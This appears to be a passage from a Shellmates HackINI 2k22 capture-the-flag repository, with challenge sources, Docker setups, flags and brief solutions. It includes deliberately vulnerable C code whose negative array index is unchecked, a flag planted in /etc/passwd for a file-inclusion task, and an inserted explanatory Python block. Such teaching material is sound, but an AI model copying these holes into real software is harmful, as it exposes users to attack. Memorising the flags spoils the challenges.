3 | ## Write-up (TODO)
4 |
--------------------------------------------------------------------------------
/pwn/no-way-out/src/Makefile:
--------------------------------------------------------------------------------
1 | CC=gcc
2 | CFLAGS=-no-pie
3 | SOURCE=no-way-out.c
4 | OUTFILE=../challenge/no-way-out
5 |
6 | all: $(SOURCE)
7 | 	$(CC) $(SOURCE) $(CFLAGS) -o $(OUTFILE)
8 | clean: $(OUTFILE)
9 | 	rm -f $(OUTFILE)
10 |
--------------------------------------------------------------------------------
/pwn/no-way-out/src/no-way-out.c:
--------------------------------------------------------------------------------
1 | #include <stdio.h>
2 | #include <fcntl.h>
3 | #include <unistd.h>
4 |
5 | void setup(void);
6 | void win(void);
7 |
8 | int main(int argc, char *argv[]) {
9 |     int idx;
10 |     char arr[8][8];
11 |
12 |     setup();
13 |
14 |     while (1) {
15 |         printf("Idx: ");
16 |         scanf("%d", &idx);
17 |
18 |         if (idx >= 8) {
19 |             printf("Wrong index!\n");
20 |         } else {
21 |             printf("Data: ");
22 |             read(0, arr[idx], 8);
23 |         }
24 |     }
25 |
26 |     return 0;
27 | }
28 |
29 | void setup(void) {
30 |     setbuf(stdin, NULL);
31 |     setbuf(stdout, NULL);
32 |     setbuf(stderr, NULL);
33 | }
34 |
35 | void win(void) {
36 |     int fd;
37 |     char buf[256] = { '\0' };
38 |
39 |     fd = open("/challenge/flag.txt", O_RDONLY);
40 |     read(fd, buf, 256);
41 |     write(1, buf, 256);
42 | }
43 |
--------------------------------------------------------------------------------
/pwn/stronk-boi/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM ubuntu:18.04
2 |
3 | RUN apt-get update && \
4 |     apt-get install -y socat && \
5 |     rm -rf /var/lib/apt/lists/*
6 |
7 | RUN useradd ctf && \
8 |     mkdir /challenge
9 |
10 | COPY challenge /challenge
11 |
12 | WORKDIR /challenge
13 |
14 | RUN chmod +x entrypoint.sh stronk-boi && \
15 |     chown -R root:root .
16 |
17 | USER ctf
18 |
19 | EXPOSE 1337
20 |
21 | ENTRYPOINT ["./entrypoint.sh"]
22 |
--------------------------------------------------------------------------------
/pwn/stronk-boi/README.md:
--------------------------------------------------------------------------------
1 | # stronk boi
2 |
3 | **`Author:`** [chenx3n](https://github.com/malikDaCoda)
4 |
5 | ## Description
6 |
7 | > Check out my revolutionary in-memory file service!
8 |
9 | **Connect with**: `ncat -v --ssl stronk-boi.challs.shellmates.club 443`
10 |
11 | [stronk-boi](challenge/stronk-boi)
12 | [libc-2.27.so](dist/libc-2.27.so)
13 | [ld-2.27.so](dist/ld-2.27.so)
14 |
15 | ## Solution
16 |
17 | Solution of the challenge can be found [here](solution/).
18 |
--------------------------------------------------------------------------------
/pwn/stronk-boi/challenge.yml:
--------------------------------------------------------------------------------
1 | name: "stronk boi"
2 | author: "chenx3n"
3 | author_link: "https://github.com/malikDaCoda"
4 |
5 | category: pwn
6 | difficulty: medhard
7 |
8 | description: |
9 |   > Check out my revolutionary in-memory file service!
10 |
11 |   **Author**: chenx3n
12 |
13 | connection_info: ncat -v --ssl stronk-boi.challs.shellmates.club 443
14 |
15 | image: gcr.io/glowing-reserve-336013/stronk-boi
16 |
17 | value: 500
18 | type: dynamic
19 |
20 | extra:
21 |   initial: 500
22 |   decay: 15
23 |   minimum: 50
24 |
25 | flags:
26 |   - shellmates{0K4Y_you_PRovEd_y0U_h4V3_tH3_fOrC3}
27 |
28 | files:
29 |   - ./src/stronk-boi.c
30 |   - ./challenge/stronk-boi
31 |   - ./lib/libc-2.27.so
32 |   - ./lib/ld-2.27.so
33 |
34 | tags:
35 |   - medium/hard
36 |
37 | state: visible
38 |
39 | version: "0.1"
40 |
--------------------------------------------------------------------------------
/pwn/stronk-boi/challenge/entrypoint.sh:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 |
3 | EXEC="./stronk-boi"
4 | PORT=1337
5 |
6 | socat -dd -T300 tcp-l:$PORT,reuseaddr,fork,keepalive exec:"$EXEC",stderr
7 |
--------------------------------------------------------------------------------
/pwn/stronk-boi/challenge/flag.txt:
--------------------------------------------------------------------------------
1 | shellmates{0K4Y_you_PRovEd_y0U_h4V3_tH3_fOrC3}
--------------------------------------------------------------------------------
/pwn/stronk-boi/challenge/stronk-boi:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/pwn/stronk-boi/challenge/stronk-boi
--------------------------------------------------------------------------------
/pwn/stronk-boi/docker-compose.yml:
--------------------------------------------------------------------------------
1 | version: '3.8'
2 |
3 | services:
4 |
5 |   server:
6 |     build: .
7 |     ports:
8 |       - '1500:1337'
9 |     deploy:
10 |       replicas: 1
11 |       restart_policy:
12 |         condition: on-failure
13 |       resources:
14 |         limits:
15 |           memory: 50M
16 |     healthcheck:
17 |       test: socat - TCP4:localhost:1337 || exit 1
18 |       interval: 60s
19 |       timeout: 2s
20 |       retries: 5
21 |
--------------------------------------------------------------------------------
/pwn/stronk-boi/lib/ld-2.27.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/pwn/stronk-boi/lib/ld-2.27.so
--------------------------------------------------------------------------------
/pwn/stronk-boi/lib/libc-2.27.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/pwn/stronk-boi/lib/libc-2.27.so
--------------------------------------------------------------------------------
/pwn/stronk-boi/solution/README.md:
--------------------------------------------------------------------------------
1 | # stronk boi
2 |
3 | ## Write-up (TODO)
4 |
--------------------------------------------------------------------------------
/pwn/stronk-boi/solution/ld-2.27.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/pwn/stronk-boi/solution/ld-2.27.so
--------------------------------------------------------------------------------
/pwn/stronk-boi/solution/libc-2.27.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/pwn/stronk-boi/solution/libc-2.27.so
--------------------------------------------------------------------------------
/pwn/stronk-boi/solution/libc.so.6:
--------------------------------------------------------------------------------
1 | libc-2.27.so
--------------------------------------------------------------------------------
/pwn/stronk-boi/solution/stronk-boi:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/pwn/stronk-boi/solution/stronk-boi
--------------------------------------------------------------------------------
/pwn/stronk-boi/solution/stronk-boi_patched:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/pwn/stronk-boi/solution/stronk-boi_patched
--------------------------------------------------------------------------------
/pwn/stronk-boi/src/Makefile:
--------------------------------------------------------------------------------
1 | CC=gcc
2 | CFLAGS=-Wl,-z,relro,-z,now -fstack-protector
3 | SOURCE=stronk-boi.c
4 | OUTFILE=../challenge/stronk-boi
5 |
6 | all: $(SOURCE)
7 | 	$(CC) $(SOURCE) $(CFLAGS) -o $(OUTFILE)
8 | clean: $(OUTFILE)
9 | 	rm -f $(OUTFILE)
10 |
--------------------------------------------------------------------------------
/reverse/6pack/README.md:
--------------------------------------------------------------------------------
1 | # Challenge Name
2 |
3 | **`Author:`** [yh_0x7](https://github.com/yh-0x7)
4 |
5 | ## Description
6 | - My friend sent me this binary [challenge.exe](challenge/challenge.exe).
7 | - He said that it's ultimately packed.
8 | - Help me to unpack it.
9 | ## Solution
10 |
11 | Solution of the challenge can be found [here](solution/).
12 |
--------------------------------------------------------------------------------
/reverse/6pack/challenge/challenge.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/reverse/6pack/challenge/challenge.exe
--------------------------------------------------------------------------------
/reverse/6pack/solution/README.md:
--------------------------------------------------------------------------------
1 | # 6-pack
2 |
3 | ## Write-up
4 | - The exe binary is packed with UPX.
5 | - Use this command to unpack the binary:
6 | `upx -d challenge.exe`
7 | - Then use the Ghidra decompiler to read the code.
8 | ## Flag
9 |
10 | `shellmates{uPx_1S_4_N1c3_w4Y_F0r_P4Ck1n9_B1n4R132}`
11 |
--------------------------------------------------------------------------------
/reverse/6pack/source/source.c:
--------------------------------------------------------------------------------
1 | #include <stdio.h>
2 | #include <string.h>
3 | char flag[51];
4 | int flag_arr[51] = {115,104,101,108,108,109,97,116,101,115,123,117,80,120,95,49,83,95,52,95,78,49,99,51,95,119,52,89,95,70,48,114,95,80,52,67,107,49,110,57,95,66,49,110,52,82,49,51,50,125};
5 | char tmp[2];
6 | int main() {
7 |     for(int i=0;i<50;i++){
8 |         sprintf(tmp,"%c",flag_arr[i]);
9 |         strcat(flag,tmp);
10 |     }
11 |     char input[51];
12 |     printf("Input flag : ");
13 |     fgets(input, 51, stdin);
14 |     if (!strcmp(input,flag)) {
15 |         printf("Correct flag!\n");
16 |     } else {
17 |         printf("Wrong flag!\nTry Again.");
18 |     }
19 |     return 0;
20 | }
21 |
--------------------------------------------------------------------------------
/reverse/6pack/source/source.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/reverse/6pack/source/source.exe
--------------------------------------------------------------------------------
/reverse/README.md:
--------------------------------------------------------------------------------
1 | # Reverse
2 |
3 | This directory contains challenges related to the `Reverse` category. Please consider reading the [contribution guidelines](../CONTRIBUTING.md) before making any contribution.
4 |
--------------------------------------------------------------------------------
/reverse/baby-asm/README.md:
--------------------------------------------------------------------------------
1 | # baby asm
2 |
3 | **`Author:`** [ouxs](https://github.com/ouxs-19)
4 |
5 | ## Description
6 |
7 | > Put your tools aside for a second and start reading some real code.
8 |
9 | ## Solution
10 |
11 | Solution of the challenge can be found [here](solution/).
--------------------------------------------------------------------------------
/reverse/baby-asm/challenge.yml:
--------------------------------------------------------------------------------
1 | name: "baby asm"
2 | author: "Ouxs"
3 | author_link: "https://github.com/ouxs-19/"
4 | category: reverse
5 |
6 | difficulty: easy
7 | description: |
8 |   > Put your tools aside for a second and start reading some real code.
9 |   **Author** : Ouxs
10 |
11 | flags:
12 |   - shellmates{B4CK_T0_Th3_r0075!!}
13 |
14 | files:
15 |   - challenge/chall.asm
16 |   - challenge/enc
17 |
18 | tags:
19 |   - easy
20 |
21 | value: 500
22 | type: dynamic
23 | extra:
24 |   initial: 500
25 |   decay: 15
26 |   minimum: 50
27 |
28 | state: visible
29 | version: "0.1"
30 |
--------------------------------------------------------------------------------
/reverse/baby-asm/challenge/chall:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/reverse/baby-asm/challenge/chall
--------------------------------------------------------------------------------
/reverse/baby-asm/challenge/chall.asm:
--------------------------------------------------------------------------------
1 |
2 | bits 64
3 |
4 | section .data
5 |     prompt: db 'Which file you want to encrypt : ', 10, 0
6 |
7 | section .text
8 |     global _start
9 | _start:
10 |     sub rsp, 64
11 |     mov rax, 1
12 |     mov rdi, 1
13 |     mov rsi, prompt
14 |     mov rdx, 34
15 |     syscall                 ; write(1, prompt, 34)
16 |     xor rax, rax
17 |     xor rdi, rdi
18 |     mov rsi, rsp
19 |     mov rdx, 64
20 |     syscall                 ; read(0, rsp, 64): the file name
21 |     cmp byte[rsp+rax-1],0xa
22 |     jne no_nl
23 |     mov byte[rsp+rax-1],0   ; replace the trailing newline with NUL
24 | no_nl:
25 |     mov rax, 2
26 |     mov rdi, rsp
27 |     xor rsi, rsi
28 |     xor rdx, rdx
29 |     syscall                 ; open(file name, O_RDONLY)
30 |     mov r8, rax
31 | loop:
32 |     xor rax, rax
33 |     mov rdi, r8
34 |     mov rsi, rsp
35 |     mov rdx, 1
36 |     syscall                 ; read one byte from the file
37 |     cmp rax, 0
38 |     je end
39 |     mov al, byte[rsp]
40 |     cmp al, 32
41 |     jl func1                ; jl is a signed comparison
42 |     cmp al, 64
43 |     jl func2
44 |     cmp al, 96
45 |     jl func3
46 |     jmp func4
47 | func1:
48 |     add al, 64
49 |     jmp func
50 | func2:
51 |     sub al, 32
52 |     jmp func
53 | func3:
54 |     add al, 32
55 |     jmp func
56 | func4:
57 |     sub al, 64
58 |     jmp func
59 | func:
60 |     mov byte[rsp], al
61 |     mov rax, 1
62 |     mov rdi, 1
63 |     mov rsi, rsp
64 |     mov rdx, 1
65 |     syscall                 ; write the transformed byte to stdout
66 |     jmp loop
67 |
68 | end:
69 |     mov rax, 0x3c
70 |     xor rdi, rdi
71 |     syscall                 ; exit(0)
72 |
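Added example (not part of the repository): a Python model of the byte transform in chall.asm above, together with its inverse. It mirrors the signed `jl` comparisons, which shows that the mapping is reversible only for plaintext bytes 0x00-0x7F; the function names are this example's own.

```python
# Model of the per-byte transform in chall.asm and its inverse.
# All function names are assumptions of this example, not repository code.
# The sample bytes are the visible prefix of the enc file and of flag.txt
# as shown in this dump.


def as_signed8(b):
    """View a byte as `jl` does after `cmp al, imm8`: a signed 8-bit value."""
    return b - 256 if b >= 0x80 else b


def encode_byte(b):
    """Mirror func1..func4 of chall.asm for one byte (0..255)."""
    s = as_signed8(b)
    if s < 32:      # func1: 0x00..0x1F, and 0x80..0xFF because they are negative
        delta = 64
    elif s < 64:    # func2
        delta = -32
    elif s < 96:    # func3
        delta = 32
    else:           # func4
        delta = -64
    return (b + delta) & 0xFF  # al is 8 bits wide, so the result wraps


def decode_byte(c):
    """Inverse of encode_byte for plaintext bytes 0x00..0x7F (same ranges as solve.py)."""
    if c < 32:
        return c + 32
    if c < 64:
        return c + 64
    if c < 96:
        return c - 64
    return c - 32


def encode(data):
    return bytes(encode_byte(b) for b in data)


def decode(data):
    return bytes(decode_byte(c) for c in data)


def ambiguous_cipher_bytes():
    """Map every cipher byte that has more than one plaintext byte to those bytes."""
    preimages = {}
    for b in range(256):
        preimages.setdefault(encode_byte(b), []).append(b)
    return {c: p for c, p in preimages.items() if len(p) > 1}


if __name__ == "__main__":
    sample = b"shellmates{"
    enc = encode(sample)
    print(enc, decode(enc))
    # Bytes 0xC0..0xFF take the func1 branch and wrap onto 0x00..0x3F, so a
    # decoder cannot tell them apart from the ASCII bytes 0x20..0x3F and
    # 0x60..0x7F that encode to the same values.
    amb = ambiguous_cipher_bytes()
    print(len(amb), "cipher bytes have two possible plaintext bytes")
```

Decoding is unambiguous for ASCII input, which is the case solve.py handles; a file containing bytes 0xC0 and above cannot be recovered from the output alone.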
--------------------------------------------------------------------------------
/reverse/baby-asm/challenge/chall.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/reverse/baby-asm/challenge/chall.o
--------------------------------------------------------------------------------
/reverse/baby-asm/challenge/enc:
--------------------------------------------------------------------------------
1 | Which file you want to encrypt :
2 | 3(%,,-!4%3;bcktt(2=
--------------------------------------------------------------------------------
/reverse/baby-asm/challenge/flag.txt:
--------------------------------------------------------------------------------
1 | shellmates{B4CK_T0_Th3_r0075!!}
--------------------------------------------------------------------------------
/reverse/baby-asm/soultion/solve.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 |
3 |
4 | def decode(char):
5 |     n = ord(char)
6 |     if n < 32:
7 |         return chr(n + 32)
8 |     elif n < 64:
9 |         return chr(n + 64)
10 |     elif n < 96:
11 |         return chr(n - 64)
12 |     else:
13 |         return chr(n - 32)
14 |
15 |
16 | with open("enc", "rb") as f:
17 |     enc = f.read().decode().split("\n")[1]
18 |
19 | flag = "".join(decode(char) for char in enc)
20 | print(f"The flag : {flag}")
21 |
--------------------------------------------------------------------------------
/reverse/magic/README.md:
--------------------------------------------------------------------------------
1 | # magic
2 |
3 | **`Author:`** [Muhammad](https://github.com/muhammedBkf)
4 |
5 | ## Description
6 |
7 | > Only true wizards can find my magic secret.
8 | > The flag looks like: shellmates{magic_secret}.
9 | [chal](challenge/chall)
10 |
11 | ## Solution
12 |
13 | Solution of the challenge can be found [here](solution/).
14 |
--------------------------------------------------------------------------------
/reverse/magic/challenge.yml:
--------------------------------------------------------------------------------
1 | name: "magic"
2 | author: "Muhammad"
3 | author_link: "https://github.com/muhammedBkf"
4 | category: reverse
5 | difficulty: ezmed
6 | description: |
7 |   > Only true wizards can find my magic secret.
8 |   > The flag looks like: shellmates{magic_secret}.
9 |   **Author** : Muhammad
10 | flags:
11 |   - shellmates{ELF_m4G!c_ByTes_:D}
12 | files:
13 |   - challenge/chall
14 | # DO NOT CHANGE
15 | tags:
16 |   - easy/medium
17 | value: 500
18 | type: dynamic
19 | extra:
20 |   initial: 500
21 |   decay: 15
22 |   minimum: 50
23 | state: visible
24 | version: "0.1"
25 |
--------------------------------------------------------------------------------
/reverse/magic/challenge/chall:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/reverse/magic/challenge/chall
--------------------------------------------------------------------------------
/reverse/magic/challenge/chall.c:
--------------------------------------------------------------------------------
1 | #include <stdio.h>
2 | #include <string.h>
3 | #include <unistd.h>
4 |
5 | #define SECRET_LENGTH 18
6 |
7 | int compare_with_secret(char * input);
8 | int mudolo(int op1,int op2);
9 | int main() {
10 |     printf("You think that you found my magic secret?\nTry it out : ");
11 |     char input[SECRET_LENGTH + 1];
12 |     scanf("%18s", input);
13 |     if (compare_with_secret(input)) printf("Congrats you wizard!\n");
14 |     else printf("Wrong! Try again!\n");
15 |     return 0;
16 | }
17 |
18 | int mudolo(int op1,int op2){
19 |     return op1%op2;
20 | }
21 |
22 | int compare_with_secret(char * input) {
23 |     char cipher[SECRET_LENGTH + 1] = "\x3a\x9\xa\x19\x12\x71\xb\x67\x1c\x1a\xe\x3f\x2b\x20\x3f\x19\x45\x1";
24 |     char c;
25 |     char buf[256];
26 |     memset(buf,'\0',256);
27 |     readlink("/proc/self/exe", buf, 255);
28 |     FILE * fd = fopen(buf, "rb");
29 |
30 |     for (char i = 0; i < SECRET_LENGTH; ++i) {
31 |         fseek(fd, mudolo(i,4), SEEK_SET);
32 |         fread(&c, 1, 1, fd);
33 |         input[i] = c ^ input[i];
34 |     }
35 |     return !memcmp(cipher, input, SECRET_LENGTH);
36 | }
--------------------------------------------------------------------------------
/reverse/magic/challenge/pychall.py:
--------------------------------------------------------------------------------
1 | FLAG="ELF_m4G!c_ByTes_:D"
2 | print(len(FLAG))
3 | KEY="\x7f\x45\x4c\x46"
4 | for i in range(len(FLAG)):
5 |     print(f'\\x{ord(FLAG[i]) ^ ord(KEY[i % len(KEY)]):x}', end="")
--------------------------------------------------------------------------------
/warmup/README.md:
--------------------------------------------------------------------------------
1 | # Warmup
2 |
3 | This directory contains challenges related to the `Warmup` category. Please consider reading the [contribution guidelines](../CONTRIBUTING.md) before making any contribution.
4 |
5 |
--------------------------------------------------------------------------------
/warmup/my-first-ncat/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM ubuntu:18.04
2 |
3 | RUN apt-get update && \
4 |     apt-get install -y socat && \
5 |     rm -rf /var/lib/apt/lists/*
6 |
7 | RUN useradd ctf && \
8 |     mkdir /challenge
9 |
10 | COPY challenge /challenge
11 |
12 | WORKDIR /challenge
13 |
14 | RUN chmod +x entrypoint.sh chall.sh && \
15 |     chown -R root:root .
16 | 17 | USER ctf 18 | 19 | EXPOSE 1337 20 | 21 | ENTRYPOINT ["./entrypoint.sh"] 22 | -------------------------------------------------------------------------------- /warmup/my-first-ncat/README.md: -------------------------------------------------------------------------------- 1 | # My first ncat 2 | 3 | **`Author:`** [chenx3n](https://github.com/malikDaCoda) 4 | 5 | ## Description 6 | 7 | Most challenges are accessible remotely using `ncat`. 8 | On debian-based Linux systems, you can install `ncat` using the following command: 9 | 10 | ```bash 11 | sudo apt install ncat 12 | ``` 13 | 14 | You can connect to the challenge using the command below. 15 | 16 | **Connect with**: `ncat -v --ssl my-first-ncat.challs.shellmates.club 443` 17 | 18 | ## Solution 19 | 20 | Solution of the challenge can be found [here](solution/). 21 | 22 | -------------------------------------------------------------------------------- /warmup/my-first-ncat/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "My first ncat" 2 | author: "chenx3n" 3 | author_link: "https://github.com/malikDaCoda" 4 | 5 | category: warmup 6 | difficulty: beginner 7 | 8 | description: | 9 | Most challenges are accessible remotely using `ncat`. 10 | On debian-based Linux systems, you can install `ncat` using the following command: 11 | 12 | ```bash 13 | sudo apt install ncat 14 | ``` 15 | 16 | You can connect to the challenge using the command below. 
17 | 18 | **Author**: chenx3n 19 | 20 | connection_info: ncat -v --ssl my-first-ncat.challs.shellmates.club 443 21 | 22 | image: gcr.io/glowing-reserve-336013/my-first-ncat 23 | 24 | value: 50 25 | type: standard 26 | 27 | flags: 28 | - shellmates{NcAt_1s_c000LL} 29 | 30 | tags: 31 | - beginner 32 | 33 | state: visible 34 | 35 | version: "0.1" 36 | -------------------------------------------------------------------------------- /warmup/my-first-ncat/challenge/chall.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | echo "shellmates{NcAt_1s_c000LL}" 4 | -------------------------------------------------------------------------------- /warmup/my-first-ncat/challenge/entrypoint.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | EXEC="./chall.sh" 4 | PORT=1337 5 | 6 | socat -dd -T300 tcp-l:$PORT,reuseaddr,fork,keepalive exec:"$EXEC",stderr 7 | -------------------------------------------------------------------------------- /warmup/my-first-ncat/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.8' 2 | 3 | services: 4 | 5 | server: 6 | build: . 
7 | ports: 8 | - '1650:1337' 9 | deploy: 10 | replicas: 1 11 | restart_policy: 12 | condition: on-failure 13 | resources: 14 | limits: 15 | memory: 50M 16 | healthcheck: 17 | test: socat - TCP4:localhost:1337 || exit 1 18 | interval: 60s 19 | timeout: 2s 20 | retries: 5 21 | -------------------------------------------------------------------------------- /warmup/my-first-ssh/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.8 2 | 3 | RUN apt-get update \ 4 | && DEBIAN_FRONTEND=noninteractive apt-get install -y --no-install-recommends openssh-server sudo systemd rsyslog 5 | 6 | RUN useradd -s /bin/bash ctf \ 7 | && echo 'ctf:ctf' | chpasswd \ 8 | && usermod -aG sudo ctf 9 | 10 | WORKDIR /challenge 11 | 12 | COPY challenge/flag.txt / 13 | COPY challenge/sshd_config /etc/ssh/sshd_config 14 | 15 | EXPOSE 22 16 | 17 | ENTRYPOINT service rsyslog start \ 18 | && service ssh start \ 19 | && tail -f --retry /var/log/auth.log 20 | -------------------------------------------------------------------------------- /warmup/my-first-ssh/README.md: -------------------------------------------------------------------------------- 1 | # My first ssh 2 | 3 | **`Author:`** [chenx3n](https://github.com/malikDaCoda) 4 | 5 | ## Description 6 | 7 | Connect with SSH using the command below and try to read the flag at `/flag.txt`. 8 | Make sure to have `openssl` installed: 9 | 10 | ```bash 11 | sudo apt install openssl 12 | ``` 13 | 14 | You can connect to the challenge using the command below. 15 | 16 | **Connect with**: `ncat -v --ssl my-first-ssh.challs.shellmates.club 443` 17 | 18 | ## Solution 19 | 20 | Solution of the challenge can be found [here](solution/). 
21 | 22 | -------------------------------------------------------------------------------- /warmup/my-first-ssh/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "My first ssh" 2 | author: "chenx3n" 3 | author_link: "https://github.com/malikDaCoda" 4 | 5 | category: warmup 6 | difficulty: beginner 7 | 8 | description: | 9 | Connect with SSH using the command below and try to read the flag at `/flag.txt`. 10 | Make sure to have `openssl` installed: 11 | 12 | ```bash 13 | sudo apt install openssl 14 | ``` 15 | 16 | **Password**: ctf 17 | 18 | **Author**: chenx3n 19 | 20 | connection_info: ssh ctf@my-first-ssh -o ProxyCommand="openssl s_client -quiet -connect my-first-ssh.challs.shellmates.club:443 -servername my-first-ssh.challs.shellmates.club" 21 | 22 | image: gcr.io/glowing-reserve-336013/my-first-ssh 23 | 24 | value: 50 25 | type: standard 26 | 27 | flags: 28 | - shellmates{$sH_1s_FUn} 29 | 30 | tags: 31 | - beginner 32 | 33 | state: visible 34 | 35 | version: "0.1" 36 | -------------------------------------------------------------------------------- /warmup/my-first-ssh/challenge/entrypoint.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | EXEC="./chall.sh" 4 | PORT=1337 5 | 6 | socat -dd -T300 tcp-l:$PORT,reuseaddr,fork,keepalive exec:"$EXEC",stderr 7 | -------------------------------------------------------------------------------- /warmup/my-first-ssh/challenge/flag.txt: -------------------------------------------------------------------------------- 1 | shellmates{$sH_1s_FUn} 2 | -------------------------------------------------------------------------------- /warmup/my-first-ssh/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.3' 2 | 3 | services: 4 | 5 | server: 6 | build: . 
7 | ports: 8 | - '1651:22' 9 | deploy: 10 | replicas: 1 11 | restart_policy: 12 | condition: on-failure 13 | resources: 14 | limits: 15 | memory: 100M 16 | -------------------------------------------------------------------------------- /web/HEADache/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:alpine3.15 2 | 3 | COPY app /app 4 | 5 | WORKDIR /app 6 | 7 | RUN pip3 install -r requirements.txt 8 | 9 | EXPOSE 1337 10 | 11 | ENTRYPOINT python app.py -------------------------------------------------------------------------------- /web/HEADache/README.md: -------------------------------------------------------------------------------- 1 | # HEADache 2 | 3 | **`Author:`** [Muhammad](https://github.com/muhammedBkf) 4 | 5 | ## Description 6 | > Wanna learn about some types of headache? 7 | > Let's dig right into it! 8 | **Author** : Muhammad 9 | 10 | ## Solution 11 | 12 | Solution of the challenge can be found [here](solution/). 13 | -------------------------------------------------------------------------------- /web/HEADache/app/app.py: -------------------------------------------------------------------------------- 1 | from flask import Flask,url_for,request,render_template 2 | 3 | app = Flask(__name__) 4 | 5 | @app.route("/") 6 | def hello_world(): 7 | polite=False 8 | if request.headers.get('wanna-something')=="can-i-have-a-flag-please": 9 | polite=True 10 | return render_template('index.html',static=url_for('static', filename='bulma.min.css'),polite=polite) 11 | 12 | 13 | if __name__ == '__main__': 14 | app.run(host='0.0.0.0', port=1337) -------------------------------------------------------------------------------- /web/HEADache/app/requirements.txt: -------------------------------------------------------------------------------- 1 | click==8.1.3 2 | Flask==2.1.2 3 | itsdangerous==2.1.2 4 | Jinja2==3.1.2 5 | MarkupSafe==2.1.1 6 | Werkzeug==2.1.2 7 | 
-------------------------------------------------------------------------------- /web/HEADache/app/static/meme.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/web/HEADache/app/static/meme.png -------------------------------------------------------------------------------- /web/HEADache/app/templates/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | Headache 7 | 8 | 14 | 15 | 16 | 17 |
18 |
19 |

20 | HEADACHE 21 |

22 |

In this challenge you'll discover some types of Headache!

23 |

Otherwise, if you want the flag just ask for it politely :D

{% if polite %} 24 |

Ok! There u go : shellmates{hTTp_H34d37R5_&_p0L173N355_c4n_B3_U53FULL}

{% endif %} 25 |
26 |
27 |
28 |
29 |
--------------------------------------------------------------------------------
/web/HEADache/challenge.yml:
--------------------------------------------------------------------------------
1 | name: "HEADache"
2 | author: "Muhammad"
3 | author_link: "https://github.com/muhammedBkf"
4 | category: web
5 | difficulty: easy
6 | description: |
7 |   > Wanna learn about some types of headache?
8 |   > Let's dig right into it!
9 |   **Author** : Muhammad
10 | flags:
11 |   - shellmates{hTTp_H34d37R5_&_p0L173N355_c4n_B3_U53FULL}
12 |
13 | connection_info: https://headache.challs.shellmates.club
14 |
15 | files:
16 |   - app/app.py
17 |
18 | tags:
19 |   - easy
20 |
21 | # DO NOT CHANGE
22 | #
23 | value: 500
24 | type: dynamic
25 | extra:
26 |   initial: 500
27 |   decay: 15
28 |   minimum: 50
29 | state: visible
30 | version: "0.1"
31 |
--------------------------------------------------------------------------------
/web/HEADache/docker-compose.yml:
--------------------------------------------------------------------------------
1 | version: '3.8'
2 |
3 | services:
4 |   web:
5 |     build:
6 |       context: .
7 |       dockerfile: Dockerfile
8 |     ports:
9 |       - '1337:1337'
10 |     deploy:
11 |       replicas: 1
12 |       restart_policy:
13 |         condition: on-failure
14 |
--------------------------------------------------------------------------------
/web/HEADache/solution/README.md:
--------------------------------------------------------------------------------
1 | # HEADache
2 |
3 | ## Write-up
4 |
5 | After checking `app.py`, we can see that it checks whether the header `wanna-something` has the value `can-i-have-a-flag-please` before returning the flag, so we only need to set it.
6 |
7 | ```bash
8 | curl https://headache.challs.shellmates.club -H "wanna-something: can-i-have-a-flag-please"
9 | ```
10 |
11 | ## Flag
12 |
13 | `shellmates{hTTp_H34d37R5_&_p0L173N355_c4n_B3_U53FULL}`
14 |
--------------------------------------------------------------------------------
/web/README.md:
--------------------------------------------------------------------------------
1 | # Web
2 |
3 | This directory contains challenges related to the `Web` category. Please consider reading the [contribution guidelines](../CONTRIBUTING.md) before making any contribution.
4 |
--------------------------------------------------------------------------------
/web/baby-lfi-2/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM php:7.3-apache
2 |
3 | RUN apt-get update
4 |
5 | COPY ./challenge/* /var/www/html/
6 |
7 | RUN echo "\nshellmates{yOU_M4De_yOUr_waY_7hRough_iT}" >> /etc/passwd
8 |
9 | WORKDIR /var/www/html
--------------------------------------------------------------------------------
/web/baby-lfi-2/README.md:
